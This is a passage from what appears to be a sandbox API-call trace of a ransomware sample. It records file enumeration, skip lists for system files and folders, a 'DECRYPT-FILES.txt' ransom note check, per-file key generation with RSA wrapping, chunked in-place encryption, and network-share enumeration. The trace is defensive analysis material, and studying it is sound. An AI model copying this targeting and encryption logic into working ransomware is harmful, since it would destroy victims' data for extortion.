nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0187.065] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0187.065] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf233d600, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf233d600, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.065] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0187.066] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0187.066] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf201d920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf233d600, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf233d600, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0187.066] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0187.066] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0187.066] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0187.066] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0187.066] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0187.066] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0187.066] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0187.066] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0187.066] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0187.066] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0187.066] lstrlenW (lpString="0a16c9.tmp") returned 10 [0187.066] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0187.066] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0187.066] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0187.066] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0187.066] lstrlenW (lpString="C:\\Users\\Public\\Videos\\") returned 23 [0187.066] lstrlenW (lpString="0a16c9.tmp") returned 10 [0187.066] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Public\\Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0187.066] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Videos\\0a16c9.tmp") returned="C:\\Users\\Public\\Videos\\0a16c9.tmp" [0187.066] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0187.066] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\0a16c9.tmp" (normalized: "c:\\users\\public\\videos\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0187.066] CloseHandle (hObject=0x0) returned 0 [0187.066] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.067] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f9c6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f9c6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f9c6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0187.067] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0187.067] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0187.067] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0187.067] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0187.067] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0187.067] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0187.067] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xb1f618a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb1f618a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0187.067] lstrcmpW (lpString1="Sample Videos", lpString2=".") returned 1 [0187.067] lstrcmpW (lpString1="Sample Videos", lpString2="..") returned 1 [0187.067] lstrcatW (in: lpString1="Sample Videos", lpString2="\\" | out: lpString1="Sample Videos\\") returned="Sample Videos\\" [0187.067] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="Sample Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\") returned="C:\\Users\\Public\\Videos\\Sample Videos\\" [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="\\Program Files") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch=":\\Windows") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="\\Games\\") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="\\Tor Browser\\") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="\\ProgramData\\") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="\\All Users") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="\\IETldCache\\") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="\\Local Settings\\") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="\\AppData\\Local") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="AhnLab") returned 0x0 [0187.067] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\Sample Videos\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0187.067] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos\\") returned 37 [0187.067] lstrlenW (lpString="0a16c9.tmp") returned 10 [0187.067] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Videos\\Sample Videos\\\\0a16c9.tmp") returned 48 [0187.067] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\videos\\sample videos\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0187.070] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos\\") returned 37 [0187.070] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0187.070] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Videos\\Sample Videos\\\\DECRYPT-FILES.txt") returned 55 [0187.070] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\videos\\sample videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0187.070] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos\\") returned 37 [0187.070] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\*") returned="C:\\Users\\Public\\Videos\\Sample Videos\\*" [0187.070] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf2363760, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2363760, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0187.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0187.070] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf2363760, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2363760, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0187.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0187.070] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2363760, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf2363760, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2363760, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0187.070] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0187.070] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0187.070] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0187.070] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0187.070] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0187.070] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0187.070] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0187.070] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0187.070] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0187.070] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0187.070] lstrlenW (lpString="0a16c9.tmp") returned 10 [0187.070] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0187.070] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0187.070] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0187.070] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0187.070] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos\\") returned 37 [0187.070] lstrlenW (lpString="0a16c9.tmp") returned 10 [0187.071] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\") returned="C:\\Users\\Public\\Videos\\Sample Videos\\" [0187.071] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\0a16c9.tmp") returned="C:\\Users\\Public\\Videos\\Sample Videos\\0a16c9.tmp" [0187.071] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0187.071] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\0a16c9.tmp" (normalized: "c:\\users\\public\\videos\\sample videos\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0187.071] CloseHandle (hObject=0x0) returned 0 [0187.071] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.071] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb196e1a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb196e1a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb196e1a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0187.071] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0187.071] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0187.071] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0187.071] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0187.071] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0187.071] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0187.071] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb1f618a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1907c92, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wildlife.wmv.BaIi6QC", cAlternateFileName="")) returned 1 [0187.071] lstrcmpiW (lpString1="Wildlife.wmv.BaIi6QC", lpString2="DECRYPT-FILES.txt") returned 1 [0187.071] lstrcmpiW (lpString1="Wildlife.wmv.BaIi6QC", lpString2="autorun.inf") returned 1 [0187.071] lstrcmpiW (lpString1="Wildlife.wmv.BaIi6QC", lpString2="boot.ini") returned 1 [0187.071] lstrcmpiW (lpString1="Wildlife.wmv.BaIi6QC", lpString2="desktop.ini") returned 1 [0187.071] lstrcmpiW (lpString1="Wildlife.wmv.BaIi6QC", lpString2="ntuser.dat") returned 1 [0187.072] lstrcmpiW (lpString1="Wildlife.wmv.BaIi6QC", lpString2="iconcache.db") returned 1 [0187.072] lstrcmpiW (lpString1="Wildlife.wmv.BaIi6QC", lpString2="bootsect.bak") returned 1 [0187.072] lstrcmpiW (lpString1="Wildlife.wmv.BaIi6QC", lpString2="ntuser.dat.log") returned 1 [0187.072] lstrcmpiW (lpString1="Wildlife.wmv.BaIi6QC", lpString2="thumbs.db") returned 1 [0187.072] lstrcmpiW (lpString1="Wildlife.wmv.BaIi6QC", lpString2="Bootfont.bin") returned 1 [0187.072] lstrlenW (lpString="Wildlife.wmv.BaIi6QC") returned 20 [0187.072] lstrcmpiW (lpString1="BaIi6QC", lpString2="lnk") returned -1 [0187.072] lstrcmpiW (lpString1="BaIi6QC", lpString2="exe") returned -1 [0187.072] lstrcmpiW (lpString1="BaIi6QC", lpString2="sys") returned -1 [0187.072] lstrcmpiW (lpString1="BaIi6QC", lpString2="dll") returned -1 [0187.072] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos\\") returned 37 [0187.072] lstrlenW (lpString="Wildlife.wmv.BaIi6QC") returned 20 [0187.072] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\") returned="C:\\Users\\Public\\Videos\\Sample Videos\\" [0187.072] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\", lpString2="Wildlife.wmv.BaIi6QC" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.BaIi6QC") returned="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.BaIi6QC" [0187.072] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0187.072] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.BaIi6QC" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.baii6qc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0187.072] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe0b0 | out: lpFileSize=0x36fe0b0*=26246290) returned 1 [0187.072] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0187.072] ReadFile (in: hFile=0x264, lpBuffer=0x36fe0bc, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x36fe0b8, lpOverlapped=0x0 | out: lpBuffer=0x36fe0bc*, lpNumberOfBytesRead=0x36fe0b8*=0x108, lpOverlapped=0x0) returned 1 [0187.074] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.074] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0187.074] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0187.074] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36fe0b0*, pdwDataLen=0x36fe09c*=0x28, dwBufLen=0x100 | out: pbData=0x36fe0b0*, pdwDataLen=0x36fe09c*=0x100) returned 1 [0187.074] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x3930000 [0187.075] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x3a30000 [0187.075] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0187.123] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0187.145] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0187.148] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0187.171] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0187.171] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0187.173] ReadFile (in: hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0 | out: lpBuffer=0x3930000*, lpNumberOfBytesRead=0x36fe094*=0x100000, lpOverlapped=0x0) returned 1 [0187.201] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0187.201] WriteFile (in: hFile=0x264, lpBuffer=0x3a30000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x36fe098, lpOverlapped=0x0 | out: lpBuffer=0x3a30000*, lpNumberOfBytesWritten=0x36fe098*=0x100000, lpOverlapped=0x0) returned 1 [0187.204] ReadFile (hFile=0x264, lpBuffer=0x3930000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x36fe094, lpOverlapped=0x0) Thread: id = 351 os_tid = 0x5ec [0179.194] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x640000 [0179.195] CryptAcquireContextW (in: phProv=0x640004, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x640004*=0x49bd18) returned 1 [0179.195] CryptImportKey (in: hProv=0x49bd18, pbData=0x740000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x640008 | out: phKey=0x640008*=0x479778) returned 1 [0179.195] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x392fbb0 | out: lphEnum=0x392fbb0*=0x4797b8) returned 0x0 [0179.195] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x3000, flProtect=0x4) returned 0x650000 [0179.196] WNetEnumResourceW (in: hEnum=0x4797b8, lpcCount=0x392fbb4, lpBuffer=0x650000, lpBufferSize=0x392fbac | out: lpcCount=0x392fbb4, lpBuffer=0x650000, lpBufferSize=0x392fbac) returned 0x0 [0179.196] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x650000, lphEnum=0x392fb80 | out: lphEnum=0x392fb80*=0x4971f8) returned 0x0 [0179.262] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.262] WNetEnumResourceW (in: hEnum=0x4971f8, lpcCount=0x392fb84, lpBuffer=0x750000, lpBufferSize=0x392fb7c | out: lpcCount=0x392fb84, lpBuffer=0x750000, lpBufferSize=0x392fb7c) returned 0x103 [0179.262] lstrlenA (lpString="kernel32.dll") returned 12 [0179.262] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0179.262] lstrcpyA (in: lpString1=0x392eef0, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0179.262] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0179.262] lstrcpyA (in: lpString1=0x392eef0, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0179.263] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0179.263] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0179.263] lstrlenA (lpString="ADDATOMA") returned 8 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0179.263] lstrlenA (lpString="ADDATOMW") returned 8 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0179.263] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0179.263] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0179.263] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0179.263] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0179.263] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0179.263] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0179.263] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0179.263] lstrcpyA (in: lpString1=0x392eef0, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0179.263] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0179.263] lstrcpyA 